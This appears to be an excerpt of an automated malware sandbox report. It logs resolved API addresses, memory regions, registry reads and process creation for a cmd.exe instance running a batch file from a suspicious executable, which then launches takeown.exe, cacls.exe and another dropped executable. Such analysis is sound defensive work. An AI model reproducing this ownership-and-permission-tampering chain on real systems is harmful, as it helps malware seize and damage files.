1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x74f5c8c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x74f66300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x74f59a90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x74f661b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadErrorMode, address_out = 0x74f5fae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x77704f40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x74f59a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x74f579b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x74f5fcb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x74f592b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x74f5a300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x74f66180 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindResourceW, address_out = 0x74f63a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SizeofResource, address_out = 0x74f58cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x74f65f20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x74f52af0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadResource, address_out = 0x74f578f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x74f52db0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x74f52da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LockResource, address_out = 0x74f57a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x74f5a4b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x74f59660 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x74f5a0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x74f5a060 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x74f587c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x74f58840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x74f57940 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x74f59560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleScreenBufferInfo, address_out = 0x74f669c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x74f66390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x74f81c30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x74f668e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x74f66920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x74f66540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x776f5e80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x776f5e00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x74f826a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x776eda90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x7770f190 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x7770a200 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x74f674f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x74f59fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x74f52d60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x74f575a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x74f525e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x74f66870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x74f668c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x74f66900 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x74f59700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x74f51b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x77712570 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x74f57920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x77709920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x74f662a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x74f66590 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x74f66860 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x74f5a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x74f59680 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x74f664a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x74f5a080 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x74f828e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x74f5a2c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x74f66020 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x74f577b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x74f5fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x74f59a70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x74f51ba0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x74f51da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x74f59930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x74f5a090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x74f58770 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x74f5fd10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x74f59fc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x74f57910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x74f59a80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x74f52dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x74f51d90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x74f52b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x74f5a3b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x74f5a0f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x776ebae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x74f664f0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x7756ed40 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteKeyW, address_out = 0x7756fca0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x775695e0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x77570680 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x7756ee90 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x7756f0a0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x7756ed60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x7756ed80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x7756f590 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyW, address_out = 0x775706c0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x7756efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x7756f7b0 |
|
1 | |
| Get Address | c:\windows\syswow64\comdlg32.dll | function = PrintDlgW, address_out = 0x766dc6a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartPage, address_out = 0x750dee10 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndDoc, address_out = 0x750b55a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartDocW, address_out = 0x750b57e0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = SetMapMode, address_out = 0x750b9590 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDeviceCaps, address_out = 0x750b0820 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndPage, address_out = 0x750dfbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x76c838f0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DialogBoxIndirectParamW, address_out = 0x76c9b6b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EndDialog, address_out = 0x76c9b430 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x76c87740 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = InflateRect, address_out = 0x76c974e0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSysColorBrush, address_out = 0x76c9efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetCursor, address_out = 0x76ca4ed0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowTextW, address_out = 0x76c94580 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetDlgItem, address_out = 0x76c91540 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoW, address_out = 0x742f1580 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = VerQueryValueW, address_out = 0x742f1500 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x742f1560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x74f5a330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x74f5f400 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x74f57580 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x74f59910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x74f66030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x74f65f90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x74f65ff0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x74f5a5d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x74f5a690 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x776e40f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x776dd630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x776decf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x74f65720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x776de140 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x776deb60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x77719990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x77715540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x77709dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x74f5a550 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x74f80a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x752c0790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x74f5f8a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x74f5fa30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x74f81030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x74f5a000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x74f814b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x74f5a4f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x74f816f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x74f59970 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x75243c90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x74f58710 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x74f596e0 |
|
1 |
System (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-01-23 14:12:06 (UTC) |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #125: cmd.exe
353
0
| Information | Value |
|---|---|
| ID | #125 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c ""C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets"" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:34, Reason: Child Process |
| Unmonitor | End Time: 00:03:40, Reason: Self Terminated |
| Monitor Duration | 00:01:06 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x9f0 |
| Parent PID | 0xa70 (c:\users\ciihmnxmn6ps\desktop\mngrxc.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
B00
0x
9B8
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x00000000003c0000 | 0x003c0000 | 0x003dffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000003c0000 | 0x003c0000 | 0x003cffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000003d0000 | 0x003d0000 | 0x003d3fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003e0000 | 0x003e0000 | 0x003e1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003e0000 | 0x003e0000 | 0x003e3fff | Private Memory | rw |
|
|
|
- |
| cmd.exe | 0x003f0000 | 0x0043ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000440000 | 0x00440000 | 0x0443ffff | Pagefile Backed Memory | - |
|
|
|
- |
| pagefile_0x0000000004440000 | 0x04440000 | 0x04453fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004460000 | 0x04460000 | 0x0449ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000044a0000 | 0x044a0000 | 0x0459ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000045a0000 | 0x045a0000 | 0x045a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000045b0000 | 0x045b0000 | 0x045b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000045c0000 | 0x045c0000 | 0x045c1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000045d0000 | 0x045d0000 | 0x0460ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004610000 | 0x04610000 | 0x0461ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004640000 | 0x04640000 | 0x0464ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004650000 | 0x04650000 | 0x047fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004650000 | 0x04650000 | 0x0469ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004700000 | 0x04700000 | 0x047fffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x04800000 | 0x048bdfff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000048c0000 | 0x048c0000 | 0x049bffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x049c0000 | 0x04cf6fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| cmdext.dll | 0x741b0000 | 0x741b7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f5c0000 | 0x7f5c0000 | 0x7f6bffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f6c0000 | 0x7f6c0000 | 0x7f6e2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f6e8000 | 0x7f6e8000 | 0x7f6eafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f6eb000 | 0x7f6eb000 | 0x7f6ebfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f6ec000 | 0x7f6ec000 | 0x7f6eefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f6ef000 | 0x7f6ef000 | 0x7f6effff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (271)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
2 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
4 | |
| Get Info | "C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat" | type = file_attributes |
|
1 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
39 | |
| Get Info | - | type = file_type |
|
3 | |
| Get Info | - | type = file_type |
|
3 | |
| Get Info | qRY2vco2.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
132 | |
| Open | STD_INPUT_HANDLE | - |
|
8 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
11 | |
| Open | - | - |
|
12 | |
| Read | - | size = 8191, size_out = 226 |
|
1 | |
| Read | - | size = 8191, size_out = 194 |
|
1 | |
| Read | - | size = 8191, size_out = 179 |
|
1 | |
| Read | - | size = 8191, size_out = 163 |
|
1 | |
| Read | - | size = 8191, size_out = 148 |
|
1 | |
| Read | - | size = 8191, size_out = 0 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
15 | |
| Write | STD_OUTPUT_HANDLE | size = 30 |
|
6 | |
| Write | STD_OUTPUT_HANDLE | size = 5 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 124 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 7 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 103 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 3 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 35 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 37 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 32 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 73 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 1 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 12 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 38 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 44 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 88, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (4)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\cacls.exe | os_pid = 0xda8, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\Windows\system32\takeown.exe | os_pid = 0xd84, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | cmd.exe | - |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\qRY2vco2.exe | os_pid = 0x5d8, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x3f0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x74f40000 |
|
2 | |
